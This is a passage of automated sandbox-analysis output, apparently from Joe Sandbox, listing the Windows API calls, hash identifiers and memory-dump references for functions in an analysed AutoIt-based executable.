                                                    • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                    • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                    • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                    • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                    • String ID:
                                                    • API String ID: 2223660684-0
                                                    • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                    • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                    • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                    • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                    APIs
                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                    • LineTo.GDI32(?,?,?), ref: 00447326
                                                    • EndPath.GDI32(?), ref: 00447336
                                                    • StrokePath.GDI32(?), ref: 00447344
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 2783949968-0
                                                    • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                    • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                    • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                    • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                    • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                    • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                    • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                    • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                    • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                    • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                      • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                      • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                    • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                    • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                    • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00472B63
                                                    • GetDC.USER32(00000000), ref: 00472B6C
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                    • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                    • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                    • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                    • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00472BB2
                                                    • GetDC.USER32(00000000), ref: 00472BBB
                                                    • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                    • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                    • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                    • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                    • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                    APIs
                                                    • __getptd_noexit.LIBCMT ref: 00415150
                                                      • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                      • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                      • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                      • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                      • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                    • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                    • __freeptd.LIBCMT ref: 0041516B
                                                    • ExitThread.KERNEL32 ref: 00415173
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1454798553-0
                                                    • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                    • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                    • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                    • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _strncmp
                                                    • String ID: Q\E
                                                    • API String ID: 909875538-2189900498
                                                    • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                    • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                    • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                    • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: U$\
                                                    • API String ID: 4104443479-100911408
                                                    • Opcode ID: 835b85672203460d32fbae7ee09f86de6f9ff03da8fa91cdddc3cb8863709e71
                                                    • Instruction ID: 856fd8c118fd9d88a35ce60e305a75550171e0483a96a15f1a05c3eab080688b
                                                    • Opcode Fuzzy Hash: 835b85672203460d32fbae7ee09f86de6f9ff03da8fa91cdddc3cb8863709e71
                                                    • Instruction Fuzzy Hash: D2C1B070E002499FEF14CF69C4907AEFBF2AF85304F2881AED451A7341D739A946CB55
                                                    APIs
                                                    • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                    • String ID: AutoIt3GUI$Container
                                                    • API String ID: 2652923123-3941886329
                                                    • Opcode ID: 07a57e7960170bdd837ebb7c984c5f31a800b532da81cd094bec597c216b7f8a
                                                    • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                    • Opcode Fuzzy Hash: 07a57e7960170bdd837ebb7c984c5f31a800b532da81cd094bec597c216b7f8a
                                                    • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove_strncmp
                                                    • String ID: U$\
                                                    • API String ID: 2666721431-100911408
                                                    • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                    • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                    • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                    • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                    APIs
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • __wcsnicmp.LIBCMT ref: 00467288
                                                    • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                    • String ID: LPT
                                                    • API String ID: 3035604524-1350329615
                                                    • Opcode ID: 3d5f434a59475b58f50c217a871fcdbd2ab5cc1753bb95236303f7f2d86bf337
                                                    • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                    • Opcode Fuzzy Hash: 3d5f434a59475b58f50c217a871fcdbd2ab5cc1753bb95236303f7f2d86bf337
                                                    • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \$h
                                                    • API String ID: 4104443479-677774858
                                                    • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                    • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                    • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                    • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID: &
                                                    • API String ID: 2931989736-1010288
                                                    • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                    • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                    • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                    • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                    • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                    • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                    • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
